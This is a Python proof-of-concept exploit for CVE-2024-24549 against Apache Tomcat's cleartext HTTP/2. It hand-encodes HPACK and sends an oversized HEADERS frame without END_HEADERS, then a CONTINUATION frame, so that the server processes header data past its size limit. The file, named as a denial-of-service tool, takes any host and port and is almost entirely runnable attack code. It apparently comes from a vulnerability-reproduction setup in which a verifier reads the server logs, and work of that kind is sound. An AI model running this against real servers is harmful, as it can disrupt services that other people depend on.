#!/usr/bin/env python3
"""
CVE-2024-24549 PoC: HTTP/2 over-limit header block split across HEADERS +
CONTINUATION frames against Apache Tomcat (h2c, prior-knowledge).

The script speaks raw HTTP/2 over cleartext using only the Python stdlib
(socket/struct). HPACK is hand-encoded with "literal header field never
indexed / new name, no Huffman" representations so no external library and no
dynamic-table accounting is needed.

Trigger sequence on a single stream (stream id 1):
  1. Send the HTTP/2 connection preface + an empty SETTINGS frame, followed
     immediately by a SETTINGS ACK for the server's SETTINGS (sent without
     waiting to receive them).
  2. Send a HEADERS frame carrying the mandatory pseudo-headers plus enough
     bulky regular headers that the cumulative decoded header size ALREADY
     exceeds the connector's maxHttpHeaderSize (pinned to 8192). The HEADERS
     frame is sent WITHOUT the END_HEADERS flag, so the server must keep
     reading the block.
  3. Pause, then send a CONTINUATION frame (WITH END_HEADERS) carrying one more
     header. This frame is sent AFTER the limit was already exceeded.

A patched (eager-validation) server would RST_STREAM after the HEADERS frame,
before consuming the trailing CONTINUATION frame. The vulnerable server defers
validateHeaders() to onHeadersComplete(), so it reads and HPACK-decodes the
CONTINUATION frame too and only then resets the stream -- emitting a
StreamException whose server-side stack trace contains
org.apache.coyote.http2.Http2Parser.onHeadersComplete (the load-bearing
discriminator captured by the verifier on the server diagnostic channel).

This script only triggers the bug; it does not judge success. It writes the
frames it sends and receives to stderr for diagnosis, but the verdict comes
from the server-side log, not from this script's output.
"""

import socket
import struct
import sys
import time

# Client connection preface (RFC 7540 section 3.5); must be the first bytes
# the client sends on a prior-knowledge h2c connection.
PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"

# Frame types (RFC 7540 section 6).
FT_DATA = 0x0
FT_HEADERS = 0x1
FT_PRIORITY = 0x2
FT_RST_STREAM = 0x3
FT_SETTINGS = 0x4
FT_PUSH_PROMISE = 0x5
FT_PING = 0x6
FT_GOAWAY = 0x7
FT_WINDOW_UPDATE = 0x8
FT_CONTINUATION = 0x9

# HEADERS / CONTINUATION flags.
FLAG_END_STREAM = 0x1   # no further frames follow on this stream
FLAG_END_HEADERS = 0x4  # this frame completes the header block

# SETTINGS flag (same bit as END_STREAM, but only meaningful on SETTINGS/PING).
FLAG_ACK = 0x1


def hpack_int(value, prefix_bits, prefix_value=0):
    """Return the HPACK prefixed-integer encoding of *value* (RFC 7541 sec 5.1).

    ``prefix_bits`` is the number N of low-order bits of the first octet that
    carry the integer; ``prefix_value`` holds the high-order bits of that
    octet (representation pattern / flags) and is OR-ed in unchanged.
    """
    limit = (1 << prefix_bits) - 1
    if value < limit:
        # Fits entirely inside the N-bit prefix: a single octet.
        return bytes([prefix_value | value])

    # Saturate the prefix, then emit the remainder 7 bits at a time,
    # least-significant group first, with the continuation bit (0x80) set on
    # every octet except the final one.
    encoded = [prefix_value | limit]
    remainder = value - limit
    while remainder >= 0x80:
        encoded.append(0x80 | (remainder & 0x7F))
        remainder >>= 7
    encoded.append(remainder)
    return bytes(encoded)


def hpack_literal_new_name(name, value):
    """Encode one header field as an HPACK "Literal Header Field Never
    Indexed -- New Name" representation, without Huffman coding
    (RFC 7541 6.2.3).

    Wire layout: the octet 0x10 (pattern 0001 with a 4-bit index of 0, which
    means a literal name follows), then the name as a length-prefixed string,
    then the value as a length-prefixed string. Each length uses a 7-bit
    prefix with the H (Huffman) bit clear. The name is encoded as ASCII and
    the value as Latin-1.
    """
    def _string_literal(raw):
        # 7-bit length prefix, H=0 (raw octets, no Huffman), then the octets.
        return hpack_int(len(raw), 7, 0x00) + raw

    return (
        b"\x10"
        + _string_literal(name.encode("ascii"))
        + _string_literal(value.encode("latin-1"))
    )


def build_frame(frame_type, flags, stream_id, payload):
    """Serialize one HTTP/2 frame (RFC 7540 section 4.1).

    Wire layout: 24-bit payload length, 8-bit type, 8-bit flags, then one
    reserved bit plus a 31-bit stream identifier, followed by the payload.

    Args:
        frame_type: frame type octet (e.g. FT_HEADERS).
        flags: flags octet.
        stream_id: stream identifier; the reserved high bit is always cleared.
        payload: frame payload (bytes-like).

    Returns:
        The complete frame as ``bytes``.

    Raises:
        ValueError: if the payload is too long for the 24-bit length field.
        struct.error: if frame_type or flags do not fit in one octet.
    """
    length = len(payload)
    if length > 0xFFFFFF:
        # Packing the length as ">I" and dropping the top byte would silently
        # truncate it and emit a corrupt frame header; refuse instead.
        raise ValueError(
            f"HTTP/2 frame payload too large for the 24-bit length field: {length} bytes"
        )
    header = struct.pack(">I", length)[1:]  # low 3 bytes = 24-bit length
    header += struct.pack(">BBI", frame_type, flags, stream_id & 0x7FFFFFFF)
    return header + payload


def recv_frames(sock, duration):
    """Log every frame the server sends during roughly `duration` seconds.

    For each complete frame, one stderr line reports its type name, flags,
    stream id and payload length. RST_STREAM frames also report their error
    code, and GOAWAY frames report their last-stream-id and error code. Frames
    are only logged, never answered (no ACK or reply of any kind is sent).

    Reading stops early if the peer closes the connection or a socket error
    occurs. Each recv() may block for up to the 0.5 s socket timeout, so the
    call can overrun `duration` by up to that amount. Any bytes of an
    incomplete trailing frame are reported before returning.

    Args:
        sock: connected socket; its timeout is set to 0.5 s as a side effect.
        duration: reading window in seconds.
    """
    # RFC 7540 section 6 frame types; anything else is shown in hex.
    frame_names = {
        FT_DATA: "DATA",
        FT_HEADERS: "HEADERS",
        0x2: "PRIORITY",
        FT_RST_STREAM: "RST_STREAM",
        FT_SETTINGS: "SETTINGS",
        0x5: "PUSH_PROMISE",
        0x6: "PING",
        FT_GOAWAY: "GOAWAY",
        0x8: "WINDOW_UPDATE",
        FT_CONTINUATION: "CONTINUATION",
    }
    sock.settimeout(0.5)
    # monotonic() is unaffected by wall-clock adjustments during the wait.
    deadline = time.monotonic() + duration
    buf = bytearray()
    while time.monotonic() < deadline:
        try:
            data = sock.recv(65535)
        except socket.timeout:  # must precede OSError: it is a subclass
            continue
        except OSError as e:
            sys.stderr.write(f"[recv] socket error: {e}\n")
            break
        if not data:
            sys.stderr.write("[recv] server closed connection\n")
            break
        buf += data
        # Consume every complete frame (9-byte header + payload); a trailing
        # partial frame stays buffered until more data arrives.
        while len(buf) >= 9:
            length = int.from_bytes(buf[0:3], "big")
            frame_end = 9 + length
            if len(buf) < frame_end:
                break
            ftype = buf[3]
            flags = buf[4]
            sid = int.from_bytes(buf[5:9], "big") & 0x7FFFFFFF
            payload = bytes(buf[9:frame_end])
            del buf[:frame_end]
            name = frame_names.get(ftype, f"0x{ftype:x}")
            extra = ""
            if ftype == FT_RST_STREAM and len(payload) >= 4:
                extra = f" error_code={int.from_bytes(payload[0:4], 'big')}"
            if ftype == FT_GOAWAY and len(payload) >= 8:
                extra = (f" last_stream={int.from_bytes(payload[0:4], 'big')}"
                         f" error_code={int.from_bytes(payload[4:8], 'big')}")
            sys.stderr.write(
                f"[recv] frame={name} flags=0x{flags:02x} stream={sid} len={length}{extra}\n"
            )
    if buf:
        sys.stderr.write(
            f"[recv] {len(buf)} bytes of an incomplete frame left unparsed\n"
        )


def main():
    """Command-line entry point: ``<host> <port> [pause_seconds]``.

    Opens one cleartext TCP connection and sends the HTTP/2 preface, an empty
    SETTINGS frame and a SETTINGS ACK. It then sends a HEADERS frame on
    stream 1 without END_HEADERS, whose header block carries ~12 KB of header
    data. After sleeping ``pause_seconds`` (default 0.4) it sends a
    CONTINUATION frame with END_HEADERS, and finally logs the server's frames
    for 2 seconds. All diagnostics go to stderr.

    Exits with status 2 on missing or malformed arguments. The socket is
    closed (best effort) even if a send fails.
    """
    usage = "usage: h2_continuation_dos.py <host> <port> [pause_seconds]\n"
    if len(sys.argv) < 3:
        sys.stderr.write(usage)
        sys.exit(2)
    host = sys.argv[1]
    try:
        port = int(sys.argv[2])
        pause = float(sys.argv[3]) if len(sys.argv) > 3 else 0.4
    except ValueError as e:
        sys.stderr.write(f"[!] bad argument: {e}\n")
        sys.stderr.write(usage)
        sys.exit(2)
    # `not pause >= 0` also rejects NaN, which time.sleep() would refuse
    # only after the HEADERS frame had already been sent.
    if not (0 < port < 65536) or not pause >= 0:
        sys.stderr.write("[!] port must be 1-65535 and pause_seconds must be >= 0\n")
        sys.stderr.write(usage)
        sys.exit(2)

    # An IPv6 literal must be bracketed inside :authority (host:port syntax).
    authority = f"[{host}]:{port}" if ":" in host else f"{host}:{port}"
    stream_id = 1
    junk_count = 12
    junk_value = "A" * 1000

    sock = socket.create_connection((host, port), timeout=10)
    try:
        sys.stderr.write(f"[*] connected to {host}:{port}\n")

        # 1. Preface + our SETTINGS (empty).
        sock.sendall(PREFACE)
        sock.sendall(build_frame(FT_SETTINGS, 0x0, 0, b""))
        # Blind ACK of the server's SETTINGS: sent without first reading them.
        sock.sendall(build_frame(FT_SETTINGS, FLAG_ACK, 0, b""))
        sys.stderr.write("[*] sent preface + SETTINGS + SETTINGS ACK\n")

        # 2. Build a HEADERS payload that ALREADY exceeds maxHttpHeaderSize
        #    (8192): mandatory pseudo-headers first (required to precede
        #    regular headers), then bulky x-junk headers, all inside the single
        #    HEADERS frame. At ~12.2 KB the frame stays below the default
        #    16384-byte SETTINGS_MAX_FRAME_SIZE.
        block = bytearray()
        block += hpack_literal_new_name(":method", "GET")
        block += hpack_literal_new_name(":scheme", "http")
        block += hpack_literal_new_name(":authority", authority)
        block += hpack_literal_new_name(":path", "/")
        for i in range(junk_count):
            block += hpack_literal_new_name(f"x-junk-{i:02d}", junk_value)

        headers_frame = build_frame(FT_HEADERS, 0x0, stream_id, bytes(block))  # no END_HEADERS
        sock.sendall(headers_frame)
        sys.stderr.write(
            f"[*] sent HEADERS (no END_HEADERS) stream={stream_id} "
            f"junk_header_value_bytes={junk_count * len(junk_value)} payload_len={len(block)}\n"
        )

        # 3. Pause, then send a CONTINUATION frame AFTER the limit is already exceeded.
        time.sleep(pause)
        cont_block = hpack_literal_new_name("x-after-limit", "B" * 200)
        cont_frame = build_frame(FT_CONTINUATION, FLAG_END_HEADERS, stream_id, cont_block)
        sock.sendall(cont_frame)
        sys.stderr.write(
            "[*] sent CONTINUATION (END_HEADERS) AFTER the over-limit HEADERS frame\n"
        )

        # Read the server's reaction (RST_STREAM / GOAWAY) for diagnosis.
        recv_frames(sock, duration=2.0)
    finally:
        # Best-effort close: a failure here must not mask an earlier error.
        try:
            sock.close()
        except OSError:
            pass
    sys.stderr.write("[*] done\n")


# Run main() only when this file is executed as a script, not when imported.
if __name__ == "__main__":
    main()
